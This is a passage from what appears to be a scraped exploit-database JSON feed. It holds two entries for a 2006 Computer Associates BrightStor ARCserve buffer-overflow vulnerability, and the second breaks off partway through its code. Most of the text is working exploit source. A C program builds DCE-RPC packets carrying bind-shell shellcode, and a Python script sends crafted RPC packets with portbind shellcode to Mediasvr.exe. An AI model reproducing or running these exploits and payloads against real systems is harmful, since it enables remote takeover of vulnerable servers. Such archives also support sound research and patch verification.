"2006-10-05T00:00:00", "type": "exploitdb", "title": "Computer Associates Products Message Engine RPC Server Multiple Buffer Overflow Vulnerabilities 1", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5143"], "modified": "2006-10-05T00:00:00", "id": "EDB-ID:28765", "href": "https://www.exploit-db.com/exploits/28765/", "sourceData": "source: http://www.securityfocus.com/bid/20365/info\r\n\r\nMultiple Computer Associates products are prone to multiple buffer-overflow vulnerabilities because the applications using an affected library fail to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.\r\n\r\nExploiting these issues allows attackers to execute arbitrary machine code within the context of the affected application.\r\n\r\n/*\r\n * LSsec.com\r\n *\r\n * CA BrightStor ARCserve Backup v11.5 Message Engine Remote Heap Overflow Exploit\r\n *\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <winsock2.h>\r\n\r\n#pragma comment(lib, \"ws2_32\")\r\n#pragma pack(1)\r\n\r\n#define _DCE_RPC_REQ 0x00\r\n#define _DCE_RPC_BIND 0x0B\r\n\r\n#define PKT_LEN 2048+24\r\n#define STUB_LEN 2048\r\n\r\nunsigned char jmp[]=\"\\xeb\\x0a\\x90\\x90\";\r\nunsigned char esi[]=\"\\xbf\\x75\\x40\\x2d\";\r\nunsigned char uef[]=\"\\x4c\\x14\\x54\\x7c\";\r\n\r\n//4444\r\nunsigned char bindshell[]=\r\n\"\\x31\\xc9\\x83\\xe9\\xb0\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xe0\"\r\n\"\\x6f\\xe3\\x2a\\x83\\xeb\\xfc\\xe2\\xf4\\x1c\\x05\\x08\\x67\\x08\\x96\\x1c\\xd5\"\r\n\"\\x1f\\x0f\\x68\\x46\\xc4\\x4b\\x68\\x6f\\xdc\\xe4\\x9f\\x2f\\x98\\x6e\\x0c\\xa1\"\r\n\"\\xaf\\x77\\x68\\x75\\xc0\\x6e\\x08\\x63\\x6b\\x5b\\x68\\x2b\\x0e\\x5e\\x23\\xb3\"\r\n\"\\x4c\\xeb\\x23\\x5e\\xe7\\xae\\x29\\x27\\xe1\\xad\\x08\\xde\\xdb\\x3b\\xc7\\x02\"\r\n\"\\x95\\x8a\\x68\\x75\\xc4\\x6e\\x08\\x4c\\x6b\\x63\\xa8\\xa1\\xbf\\x73\\xe2\\xc1\"\r\n\"\\xe3\\x43\\x68\\xa3\\x8c\\x4b\\xff\\x4b\\x23\\x5e\\x38\\x4e\\x6b\\x2c\\xd3\\xa1\"\r\n\"\\xa0\\x63\\x68\\x5a\\xfc\\xc2\\x68\\x6a\\xe8\\x31\\x8b\\xa4\\xae\\x61\\x0f\\x7a\"\r\n\"\\x1f\\xb9\\x85\\x79\\x86\\x07\\xd0\\x18\\x88\\x18\\x90\\x18\\xbf\\x3b\\x1c\\xfa\"\r\n\"\\x88\\xa4\\x0e\\xd6\\xdb\\x3f\\x1c\\xfc\\xbf\\xe6\\x06\\x4c\\x61\\x82\\xeb\\x28\"\r\n\"\\xb5\\x05\\xe1\\xd5\\x30\\x07\\x3a\\x23\\x15\\xc2\\xb4\\xd5\\x36\\x3c\\xb0\\x79\"\r\n\"\\xb3\\x3c\\xa0\\x79\\xa3\\x3c\\x1c\\xfa\\x86\\x07\\xf2\\x76\\x86\\x3c\\x6a\\xcb\"\r\n\"\\x75\\x07\\x47\\x30\\x90\\xa8\\xb4\\xd5\\x36\\x05\\xf3\\x7b\\xb5\\x90\\x33\\x42\"\r\n\"\\x44\\xc2\\xcd\\xc3\\xb7\\x90\\x35\\x79\\xb5\\x90\\x33\\x42\\x05\\x26\\x65\\x63\"\r\n\"\\xb7\\x90\\x35\\x7a\\xb4\\x3b\\xb6\\xd5\\x30\\xfc\\x8b\\xcd\\x99\\xa9\\x9a\\x7d\"\r\n\"\\x1f\\xb9\\xb6\\xd5\\x30\\x09\\x89\\x4e\\x86\\x07\\x80\\x47\\x69\\x8a\\x89\\x7a\"\r\n\"\\xb9\\x46\\x2f\\xa3\\x07\\x05\\xa7\\xa3\\x02\\x5e\\x23\\xd9\\x4a\\x91\\xa1\\x07\"\r\n\"\\x1e\\x2d\\xcf\\xb9\\x6d\\x15\\xdb\\x81\\x4b\\xc4\\x8b\\x58\\x1e\\xdc\\xf5\\xd5\"\r\n\"\\x95\\x2b\\x1c\\xfc\\xbb\\x38\\xb1\\x7b\\xb1\\x3e\\x89\\x2b\\xb1\\x3e\\xb6\\x7b\"\r\n\"\\x1f\\xbf\\x8b\\x87\\x39\\x6a\\x2d\\x79\\x1f\\xb9\\x89\\xd5\\x1f\\x58\\x1c\\xfa\"\r\n\"\\x6b\\x38\\x1f\\xa9\\x24\\x0b\\x1c\\xfc\\xb2\\x90\\x33\\x42\\x10\\xe5\\xe7\\x75\"\r\n\"\\xb3\\x90\\x35\\xd5\\x30\\x6f\\xe3\\x2a\";\r\n\r\ntypedef struct dceRpc{\r\n\tunsigned char\tver;\r\n\tunsigned char\tver_minor;\r\n\tunsigned char\tpkt_type;\r\n\tunsigned char\tpkt_flags;\r\n\tunsigned long\tdata_repres;\r\n\tunsigned short\tfrag_len;\r\n\tunsigned short\tauth_len;\r\n\tunsigned long\tcaller_id;\r\n} DCE_RPC, *PDCE_RPC;\r\n\r\ntypedef struct dceRpc2{\r\n\tunsigned long\talloc_hint;\r\n\tunsigned short\tcon_id;\r\n\tunsigned short\topnum;\r\n} DCE_RPC2, *PDCE_RPC2;\r\n\r\ntypedef struct dceRpcBind{\r\n\tunsigned short\tmax_xmit;\r\n\tunsigned short\tmax_recv;\r\n\tunsigned long\tasc_group;\r\n\tunsigned long\tnum_con_items;\r\n\tunsigned short\tcon_id;\r\n\tunsigned short\tnum_trn_items;\r\n} DCE_RPC_BIND, *PDCE_RPC_BIND;\r\n\r\nint\r\nlsHex2Raw(unsigned char* s, unsigned char* out)\r\n{\r\n\tunsigned long i;\r\n\tunsigned long j=0;\r\n\tunsigned long len;\r\n\tunsigned long ret=0;\r\n\r\n\tlen=strlen(s);\r\n\r\n\tfor(i=0; i<len; i+=2){\r\n\t\tif((s[i]>=0x30)&&(s[i]<=0x39))\r\n\t\t\tj=s[i]-0x30;\r\n\t\telse\r\n\t\t\tj=s[i]-0x61+10;\r\n\t\tj*=16;\r\n\t\tif((s[i+1]>=0x30)&&(s[i+1]<=0x39))\r\n\t\t\tj+=s[i+1]-0x30;\r\n\t\telse\r\n\t\t\tj+=s[i+1]-0x61+10;\r\n\t\tout[ret]=(unsigned char)j;\r\n\t\tret++;\r\n\t}\r\n\r\n\treturn(ret);\r\n}\r\n\r\nvoid\r\nlsInverse(unsigned char* io, unsigned long len)\r\n{\r\n\tunsigned char c;\r\n\tunsigned long i;\r\n\r\n\tfor(i=0; i<len/2; i++){\r\n\t\tc=io[len-i-1];\r\n\t\tio[len-i-1]=io[i];\r\n\t\tio[i]=c;\r\n\t}\r\n}\r\n\r\nint\r\nlsEncodeUuid(unsigned char* uuid, unsigned char* out)\r\n{\r\n\tunsigned ar=0;\r\n\tunsigned cnt=0;\r\n\tunsigned long i;\r\n\tunsigned long len;\r\n\tunsigned long ret;\r\n\tunsigned char* ptr;\r\n\r\n\tptr=uuid;\r\n\tlen=strlen(uuid);\r\n\r\n\tfor(i=0; i<len; i++){\r\n\t\tif(uuid[i]=='-'){\r\n\t\t\tuuid[i]='\\0';\r\n\t\t\tif(ar<3){\r\n\t\t\t\tret=lsHex2Raw(ptr, out);\r\n\t\t\t\tlsInverse(out, ret);\r\n\t\t\t\tout+=ret;\r\n\t\t\t\tcnt+=ret;\r\n\t\t\t}else{\r\n\t\t\t\tret=lsHex2Raw(ptr, out);\r\n\t\t\t\tout+=ret;\r\n\t\t\t\tcnt+=ret;\r\n\t\t\t}\r\n\t\t\tptr=uuid+i+1;\r\n\t\t\tar++;\r\n\t\t}\r\n\t}\r\n\tout[len]='\\0';\r\n\tret=lsHex2Raw(ptr, out);\r\n\tout+=ret;\r\n\tcnt+=ret;\r\n\r\n\treturn(cnt);\r\n}\r\n\r\nunsigned char*\r\nlsDceRpcBind(unsigned long cid, unsigned char* uuid, unsigned short ver, unsigned long* pktLen){\r\n\tunsigned char* pkt;\r\n\tunsigned char* tmp;\r\n\tunsigned char transferSyntax[]=\"8a885d04-1ceb-11c9-9fe8-08002b104860\";\r\n\tunsigned short ret;\r\n\tunsigned long cnt;\r\n\tPDCE_RPC_BIND rpc_bind;\r\n\tPDCE_RPC rpc;\r\n\r\n\tpkt=(unsigned char*)calloc(2048, 1);\r\n\r\n/* 2nd half */\r\n\ttmp=pkt;\r\n\tpkt+=sizeof(DCE_RPC);\r\n\trpc_bind=(PDCE_RPC_BIND)pkt;\r\n\trpc_bind->max_xmit = 0x16D0;\t\t//Max Xmit Frag\r\n\trpc_bind->max_recv = 0x16D0;\t\t//Max Recv Frag\r\n\trpc_bind->asc_group = 0; \t\t//Assoc Group\r\n\trpc_bind->num_con_items = 1; \t\t//Num Ctx Items\r\n\trpc_bind->con_id = 0; \t\t//Context ID\r\n\trpc_bind->num_trn_items = 1; \t\t//Num Trans Items\r\n\tpkt+=sizeof(DCE_RPC_BIND);\r\n\tcnt=lsEncodeUuid(uuid, pkt); //Interface UUID\r\n\tpkt+=cnt;\r\n\tmemcpy(pkt, &ver, sizeof(short));\t\t//Interface Ver\r\n\tpkt+=sizeof(short);\r\n\t*pkt++=0; \t\t//Interface Ver Minor\r\n\t*pkt++=0; \t\t//Interface Ver Minor\r\n\tcnt=lsEncodeUuid(transferSyntax, pkt);\t//Transfer Syntax\r\n\tpkt+=cnt;\r\n\t*pkt++=2; \t\t//Transfer Syntax Ver\r\n\t*pkt++=0; \t\t//Transfer Syntax Ver\r\n\r\n/* 1st half */\r\n\tret=pkt+2-tmp;\r\n\trpc=(PDCE_RPC)tmp;\r\n\trpc->ver = 5; \t\t//Version\r\n\trpc->ver_minor = 0; \t\t//Version (minor)\r\n\trpc->pkt_type = _DCE_RPC_BIND;\t\t//Packet Type\r\n\trpc->pkt_flags = 3; \t\t//Packet Flags\r\n\trpc->data_repres = 16; \t\t//Data Representation\r\n\trpc->frag_len = ret; \t\t //Frag Length\r\n\trpc->auth_len = 0; \t\t//Auth Length\r\n\trpc->caller_id = cid; \t\t//Call ID\r\n\r\n\t*pktLen=ret;\r\n\r\n\treturn(tmp);\r\n}\r\n\r\nunsigned char*\r\nlsDceRpcReq(unsigned long cid, unsigned long opnum, unsigned char* uuid, unsigned int encoding, unsigned long flags, unsigned long* pktLen){\r\n\tunsigned char* pkt;\r\n\tunsigned char* tmp;\r\n\tunsigned char stub[STUB_LEN];\r\n\tunsigned short ret;\r\n\tunsigned long cnt;\r\n\tPDCE_RPC rpc;\r\n\tPDCE_RPC2 rpc2;\r\n\r\n\tpkt=(unsigned char*)calloc(PKT_LEN, 1);\r\n\r\n/* 2nd half */\r\n\ttmp=pkt;\r\n\tpkt+=sizeof(DCE_RPC);\r\n\trpc2=(PDCE_RPC2)pkt;\r\n\trpc2->alloc_hint = STUB_LEN; //Stub Data\r\n\trpc2->con_id = 0; //Context ID\r\n\trpc2->opnum = opnum; //Operation Number\r\n\tpkt+=sizeof(DCE_RPC2);\r\n\r\n\tif(encoding){\r\n\t\tcnt=lsEncodeUuid(uuid, pkt); //Interface UUID\r\n\t\tpkt+=cnt;\r\n\t}\r\n\r\n/* stub modification */\r\n\r\n\tmemset(stub, 0x90, STUB_LEN);\r\n\r\n\tmemcpy(stub+680, jmp, sizeof(jmp)-1);\r\n\r\n\t//call dword ptr ds:[esi+48]\r\n\r\n\tmemcpy(stub+684, esi, sizeof(esi)-1);\r\n\r\n\t//UnhandledExceptionFilter\r\n\r\n\tmemcpy(stub+688, uef, sizeof(uef)-1);\r\n\r\n\tmemcpy(stub+692, bindshell, sizeof(bindshell)-1);\r\n\r\n/* ----------------- */\r\n\r\n\tmemcpy(pkt, stub, STUB_LEN);\r\n\tpkt+=STUB_LEN;\r\n\r\n/* 1st half */\r\n\tret=pkt-tmp;\r\n\trpc=(PDCE_RPC)tmp;\r\n\trpc->ver = 5; //Version\r\n\trpc->ver_minor = 0; //Version (minor)\r\n\trpc->pkt_type = _DCE_RPC_REQ; //Packet Type\r\n\trpc->pkt_flags = flags; //Packet Flags\r\n\trpc->data_repres = 16; //Data Representation\r\n\trpc->frag_len = ret; //Frag Length\r\n\trpc->auth_len = 0; //Auth Length\r\n\trpc->caller_id = cid; //Call ID\r\n\r\n\t*pktLen=ret;\r\n\r\n\treturn(tmp);\r\n}\r\n\r\nint\r\nlsConnect(unsigned char* host, unsigned short port){\r\n\tint s;\r\n\tstruct hostent* he;\r\n\tstruct sockaddr_in addr;\r\n\tWSADATA wsa;\r\n\r\n\tWSAStartup(MAKEWORD(2,0), &wsa);\r\n\tif((he=gethostbyname(host))==NULL){\r\n\t\tprintf(\"[-] unable to resolve %s\\n\", host);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tif((s=socket(AF_INET, SOCK_STREAM, 0))<0){\r\n\t\tprintf(\"[-] socket failed\\n\");\r\n\t\texit(1);\r\n\t}\r\n\r\n\taddr.sin_family = AF_INET;\r\n\taddr.sin_port = htons(port);\r\n\taddr.sin_addr = *((struct in_addr*)he->h_addr);\r\n\tmemset(&(addr.sin_zero), '\\0', 8);\r\n\r\n\tif(connect(s, (struct sockaddr*)&addr, sizeof(struct sockaddr))<0){\r\n\t\tprintf(\"[-] connect failed\\n\");\r\n\t\texit(1);\r\n\t}\r\n\r\n\treturn(s);\r\n}\r\n\r\nvoid\r\nlsSend(int s, unsigned char* pkt, unsigned long cnt){\r\n\tif(send(s, pkt, cnt, 0)==-1){\r\n\t\tprintf(\"[-] send failed\\n\");\r\n\t\texit(1);\r\n\t}\r\n}\r\n\r\nvoid\r\nlsRecv(int s){\r\n\tchar recvBuf[4096];\r\n\r\n\tif(recv(s, recvBuf, 4096, 0)<=0){\r\n\t\tprintf(\"[-] recv failed\\n\");\r\n\t\texit(1);\r\n\t}\r\n}\r\n\r\nint\r\nmain(int argc, char* argv[]){\r\n\tint s;\r\n\tunsigned long cnt;\r\n\tunsigned char* pkt=NULL;\r\n\tunsigned char uuidSave[64];\r\n\r\n\t/**********************************************************/\r\n\r\n\tint opnum=43;\r\n\tunsigned short port= 6503;\r\n\tunsigned char uuid[]=\"dc246bf0-7a7a-11ce-9f88-00805fe43838\";\r\n\r\n\t/**********************************************************/\r\n\r\n\tif(argc!=2){\r\n\t\tprintf(\"\\n[-] Usage: %s <ip>\\n\", argv[0]);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf(\"\\n[+] LSsec.com\\n\");\r\n\tprintf(\"\\n[+] CA BrightStor ARCserve Backup v11.5 Message Engine Remote Heap Overflow Exploit\\n\");\r\n\r\n\ts=lsConnect(argv[1], port);\r\n\r\n\tmemset(uuidSave, '\\0', sizeof(uuidSave));\r\n\tstrncpy(uuidSave, uuid, strlen(uuid));\r\n\r\n\t//bind packet\r\n\tpkt=lsDceRpcBind(1, uuid, 1, &cnt);\r\n\tlsSend(s, pkt, cnt);\r\n\tlsRecv(s);\r\n\tfree(pkt);\r\n\r\n\t//request\r\n\tpkt=lsDceRpcReq(1, opnum, uuidSave, 0, 0x03, &cnt);\r\n\tlsSend(s, pkt, cnt);\r\n\tlsRecv(s);\r\n\tfree(pkt);\r\n\r\n\treturn(0);\r\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/28765/"}, {"lastseen": "2016-02-03T08:52:48", "description": "Computer Associates Products Message Engine RPC Server Multiple Buffer Overflow Vulnerabilities (2). CVE-2006-5143. Remote exploit for windows platform", "published": "2006-10-05T00:00:00", "type": "exploitdb", "title": "Computer Associates Products Message Engine RPC Server Multiple Buffer Overflow Vulnerabilities 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5143"], "modified": "2006-10-05T00:00:00", "id": "EDB-ID:28766", "href": "https://www.exploit-db.com/exploits/28766/", "sourceData": "source: http://www.securityfocus.com/bid/20365/info\r\n \r\nMultiple Computer Associates products are prone to multiple buffer-overflow vulnerabilities because the applications using an affected library fail to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.\r\n \r\nExploiting these issues allows attackers to execute arbitrary machine code within the context of the affected application.\r\n\r\n#!/usr/bin/python\r\n#\r\n# Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Code Exploit\r\n# (Previously Unknown)\r\n#\r\n# There seems to be an design error in the handling of RPC data with xdr procedures\r\n# across several .dll's imported by Mediasvr.exe. Four bytes from an RPC packet are\r\n# processed as a particular address (xdr_handle_t data which is run through multiple bit\r\n# shifts, and reversing of bytes), and eventually loaded into ECX.\r\n#\r\n# The 191 (0xbf) procedure, followed by nulls (at least 8 bytes of nulls, which may\r\n# be Null Credentials and Auth?) leads to an exploitable condition.\r\n#\r\n# .text:0040AACD 008 mov ecx, [esp+8]\r\n# .text:0040AAD1 008 mov dword_418820, esi\r\n# .text:0040AAD7 008 push offset dword_418820\r\n# .text:0040AADC 00C mov eax, [ecx]\r\n# .text:0040AADE 00C call dword ptr [eax+2Ch]\r\n#\r\n# At this point, you have control of ECX (esp+8 is your address data). The data from the packet\r\n# is stored in memory and is relatively static (see NOTE).\r\n#\r\n# The address is then loaded into EAX, and then called as EAX+2Ch, which is\r\n# controllable data from the packet. In this code, I just jump ahead to\r\n# the portbinding shellcode.\r\n#\r\n# NOTE: The only issue I have found is when the system is rebooted, the packet data\r\n# appears at a higher memory location when Mediasvr.exe crashes\r\n# and is restarted. I have accounted for this in the code, when the port that\r\n# Mediasvr.exe is listening on is below TCP port 1100, which is usually only after\r\n# a reboot\r\n#\r\n# This was tested on BrightStor ARCserve Backup 11.5.2.0 (SP2) with the latest\r\n# CA patches on Windows XP SP2 (I believe there is some issue with SP1, which\r\n# is more then likely the memory locations)\r\n#\r\n# The patches include the following updates to Mediasvr.exe\r\n# http://supportconnectw.ca.com/public/storage/infodocs/babimpsec-notice.asp\r\n#\r\n# CA has been notified\r\n#\r\n# Author: M. Shirk\r\n# Tester: Tebodell\r\n#\r\n# (c) Copyright 2007 (Shirkdog Security) shirkdog_list $ at % hotmail dot com\r\n#\r\n# Use at your own Risk: You have been warned\r\n#------------------------------------------------------------------------\r\n\r\nimport os\r\nimport sys\r\nimport time\r\nimport socket\r\nimport struct\r\n\r\n#------------------------------------------------------------------------\r\n\r\n#Portbind shellcode; Binds shell on TCP port 4444\r\nshellcode = \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\nshellcode += \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\"\r\nshellcode += \"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\"\r\nshellcode += \"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\"\r\nshellcode += \"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\"\r\nshellcode += \"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4c\\x36\\x4b\\x4e\"\r\nshellcode += \"\\x4d\\x34\\x4a\\x4e\\x49\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x42\\x46\\x4b\\x58\"\r\nshellcode += \"\\x4e\\x56\\x46\\x42\\x46\\x42\\x4b\\x58\\x45\\x54\\x4e\\x53\\x4b\\x48\\x4e\\x57\"\r\nshellcode += \"\\x45\\x30\\x4a\\x47\\x41\\x30\\x4f\\x4e\\x4b\\x48\\x4f\\x44\\x4a\\x51\\x4b\\x38\"\r\nshellcode += \"\\x4f\\x55\\x42\\x32\\x41\\x50\\x4b\\x4e\\x49\\x44\\x4b\\x58\\x46\\x33\\x4b\\x58\"\r\nshellcode += \"\\x41\\x30\\x50\\x4e\\x41\\x43\\x42\\x4c\\x49\\x49\\x4e\\x4a\\x46\\x48\\x42\\x4c\"\r\nshellcode += \"\\x46\\x37\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x30\\x41\\x30\\x44\\x4c\\x4b\\x4e\"\r\nshellcode += \"\\x46\\x4f\\x4b\\x53\\x46\\x35\\x46\\x52\\x4a\\x42\\x45\\x57\\x45\\x4e\\x4b\\x48\"\r\nshellcode += \"\\x4f\\x45\\x46\\x52\\x41\\x30\\x4b\\x4e\\x48\\x46\\x4b\\x38\\x4e\\x50\\x4b\\x54\"\r\nshellcode += \"\\x4b\\x48\\x4f\\x45\\x4e\\x41\\x41\\x30\\x4b\\x4e\\x43\\x30\\x4e\\x32\\x4b\\x58\"\r\nshellcode += \"\\x49\\x48\\x4e\\x36\\x46\\x42\\x4e\\x41\\x41\\x56\\x43\\x4c\\x41\\x53\\x4b\\x4d\"\r\nshellcode += \"\\x46\\x56\\x4b\\x38\\x43\\x54\\x42\\x43\\x4b\\x58\\x42\\x44\\x4e\\x30\\x4b\\x38\"\r\nshellcode += \"\\x42\\x47\\x4e\\x41\\x4d\\x4a\\x4b\\x58\\x42\\x44\\x4a\\x30\\x50\\x55\\x4a\\x56\"\r\nshellcode += \"\\x50\\x48\\x50\\x34\\x50\\x30\\x4e\\x4e\\x42\\x45\\x4f\\x4f\\x48\\x4d\\x48\\x36\"\r\nshellcode += \"\\x43\\x45\\x48\\x56\\x4a\\x46\\x43\\x53\\x44\\x33\\x4a\\x46\\x47\\x37\\x43\\x57\"\r\nshellcode += \"\\x44\\x33\\x4f\\x35\\x46\\x35\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x4b\\x4c\\x4d\\x4e\"\r\nshellcode += \"\\x4e\\x4f\\x4b\\x53\\x42\\x45\\x4f\\x4f\\x48\\x4d\\x4f\\x35\\x49\\x38\\x45\\x4e\"\r\nshellcode += \"\\x48\\x46\\x41\\x58\\x4d\\x4e\\x4a\\x30\\x44\\x30\\x45\\x35\\x4c\\x36\\x44\\x30\"\r\nshellcode += \"\\x4f\\x4f\\x42\\x4d\\x4a\\x46\\x49\\x4d\\x49\\x50\\x45\\x4f\\x4d\\x4a\\x47\\x35\"\r\nshellcode += \"\\x4f\\x4f\\x48\\x4d\\x43\\x35\\x43\\x45\\x43\\x55\\x43\\x45\\x43\\x35\\x43\\x34\"\r\nshellcode += \"\\x43\\x55\\x43\\x34\\x43\\x45\\x4f\\x4f\\x42\\x4d\\x48\\x46\\x4a\\x36\\x41\\x41\"\r\nshellcode += \"\\x4e\\x45\\x48\\x36\\x43\\x45\\x49\\x58\\x41\\x4e\\x45\\x39\\x4a\\x56\\x46\\x4a\"\r\nshellcode += \"\\x4c\\x31\\x42\\x37\\x47\\x4c\\x47\\x45\\x4f\\x4f\\x48\\x4d\\x4c\\x46\\x42\\x31\"\r\nshellcode += \"\\x41\\x55\\x45\\x55\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x46\\x4a\\x4d\\x4a\\x50\\x42\"\r\nshellcode += \"\\x49\\x4e\\x47\\x45\\x4f\\x4f\\x48\\x4d\\x43\\x55\\x45\\x35\\x4f\\x4f\\x42\\x4d\"\r\nshellcode += \"\\x4a\\x36\\x45\\x4e\\x49\\x54\\x48\\x58\\x49\\x44\\x47\\x55\\x4f\\x4f\\x48\\x4d\"\r\nshellcode += \"\\x42\\x55\\x46\\x35\\x46\\x35\\x45\\x35\\x4f\\x4f\\x42\\x4d\\x43\\x39\\x4a\\x56\"\r\nshellcode += \"\\x47\\x4e\\x49\\x47\\x48\\x4c\\x49\\x37\\x47\\x45\\x4f\\x4f\\x48\\x4d\\x45\\x45\"\r\nshellcode += \"\\x4f\\x4f\\x42\\x4d\\x48\\x46\\x4c\\x36\\x46\\x56\\x48\\x36\\x4a\\x46\\x43\\x46\"\r\nshellcode += \"\\x4d\\x46\\x49\\x58\\x45\\x4e\\x4c\\x56\\x42\\x35\\x49\\x55\\x49\\x52\\x4e\\x4c\"\r\nshellcode += \"\\x49\\x38\\x47\\x4e\\x4c\\x56\\x46\\x54\\x49\\x58\\x44\\x4e\\x41\\x53\\x42\\x4c\"\r\nshellcode += \"\\x43\\x4f\\x4c\\x4a\\x50\\x4f\\x44\\x54\\x4d\\x52\\x50\\x4f\\x44\\x34\\x4e\\x32\"\r\nshellcode += \"\\x43\\x49\\x4d\\x48\\x4c\\x47\\x4a\\x33\\x4b\\x4a\\x4b\\x4a\\x4b\\x4a\\x4a\\x36\"\r\nshellcode += \"\\x44\\x47\\x50\\x4f\\x43\\x4b\\x48\\x41\\x4f\\x4f\\x45\\x57\\x46\\x34\\x4f\\x4f\"\r\nshellcode += \"\\x48\\x4d\\x4b\\x45\\x47\\x55\\x44\\x55\\x41\\x45\\x41\\x35\\x41\\x55\\x4c\\x36\"\r\nshellcode += \"\\x41\\x30\\x41\\x35\\x41\\x55\\x45\\x45\\x41\\x45\\x4f\\x4f\\x42\\x4d\\x4a\\x56\"\r\nshellcode += \"\\x4d\\x4a\\x49\\x4d\\x45\\x30\\x50\\x4c\\x43\\x35\\x4f\\x4f\\x48\\x4d\\x4c\\x56\"\r\nshellcode += \"\\x4f\\x4f\\x4f\\x4f\\x47\\x33\\x4f\\x4f\\x42\\x4d\\x4b\\x38\\x47\\x55\\x4e\\x4f\"\r\nshellcode += \"\\x43\\x48\\x46\\x4c\\x46\\x36\\x4f\\x4f\\x48\\x4d\\x44\\x55\\x4f\\x4f\\x42\\x4d\"\r\nshellcode += \"\\x4a\\x46\\x42\\x4f\\x4c\\x48\\x46\\x50\\x4f\\x45\\x43\\x55\\x4f\\x4f\\x48\\x4d\"\r\nshellcode += \"\\x4f\\x4f\\x42\\x4d\\x5a\\x90\"\r\n\r\n#------------------------------------------------------------------------\r\n\r\n#First Packet\r\nrpc_packet1=\"\\x80\\x00\\x80\\x34\\x65\\xcf\\x4c\\x7b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\nrpc_packet1+=\"\\x02\\x00\\x06\\x09\\x7e\\x00\\x00\\x00\\x01\"\r\n\r\n#Prodcedure 190 and nulls\r\nrpc_packet1+=\"\\x00\\x00\\x00\\xbf\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\r\n#Apparently these 4 bytes can be anything\r\nrpc_packet1+=\"\\x00\\x00\\x00\\x00\"\r\n\r\n#This value is important for the location of the next address\r\nrpc_packet1+=\"\\x00\\x00\\x00\\x00\"\r\n\r\n#Hardcoded Address loaded into ECX\r\nrpc_packet1+=\"\\x00\\xae\\x27\\x64\"\r\n\r\n#Just spacing\r\nrpc_packet1+=\"\\x41\\x42\\x43\\x44\"\r\n\r\n#Addess in memory, loaded into EAX and called with EAX+2Ch to get to shellcode\r\nrpc_packet1+=\"\\x3c\\x27\\xae\\x00\"\r\n\r\n#jump to shellcode for packet 1\r\nrpc_packet1+=\"\\x6c\\x27\\xae\\x00\"\r\nrpc_packet1+=\"\\xeb\\x01\"\r\nrpc_packet1+=shellcode\r\n\r\n#------------------------------------------------------------------------\r\n\r\n#Second Packet\r\nrpc_packet2=\"\\x80\\x00\\x80\\x34\\x65\\xcf\\x4c\\x7b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\nrpc_packet2+=\"\\x02\\x00\\x06\\x09\\x7e\\x00\\x00\\x00\\x01\"\r\n\r\n#Procedure 190 and nulls\r\nrpc_packet2+=\"\\x00\\x00\\x00\\xbf\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\r\n#Apparently these 4 bytes can be anything\r\nrpc_packet2+=\"\\x00\\x00\\x00\\x00\"\r\n\r\n#This value is important for the location of the next address\r\nrpc_packet2+=\"\\x00\\x00\\x00\\x00\"\r\n\r\n#Hardcoded Address loaded into ECX that seems to be hit after Mediasvr.exe has been\r\n#restarted\r\nrpc_packet2+=\"\\x00\\x9e\\x27\\x64\"\r\n\r\n#Just spacing\r\nrpc_packet2+=\"\\x41\\x42\\x43\\x44\"\r\n\r\n#Addess stored in memory, loaded into EAX and called with EAX+2Ch to get to shellcode\r\nrpc_packet2+=\"\\x3c\\x27\\x9e\\x00\"\r\n\r\n#jump to shellcode for packet 2\r\nrpc_packet2+=\"\\x6c\\x27\\x9e\\x00\"\r\nrpc_packet2+=\"\\xeb\\x01\"\r\nrpc_packet2+=shellcode\r\n\r\n# Portmap request for Mediasvr.exe\r\nrpc_portmap_req=\"\\x80\\x00\\x00\\x38\\x21\\x84\\xf7\\xc9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\nrpc_portmap_req+=\"\\x02\\x00\\x01\\x86\\xa0\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x03\\x00\\x00\"\r\nrpc_portmap_req+=\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\nrpc_portmap_req+=\"\\x06\\x09\\x7e\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\"\r\n\r\n#------------------------------------------------------------------------\r\n\r\ndef GetMediaSvrPort(target):\r\n sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n sock.connect((target,111))\r\n sock.send(rpc_portmap_req)\r\n rec = sock.recv(256)\r\n sock.close()\r\n\r\n port1 = rec[-4]\r\n port2 = rec[-3]\r\n port3 = rec[-2]\r\n port4 = rec[-1] \r\n \r\n port1 = hex(ord(port1))\r\n port2 = 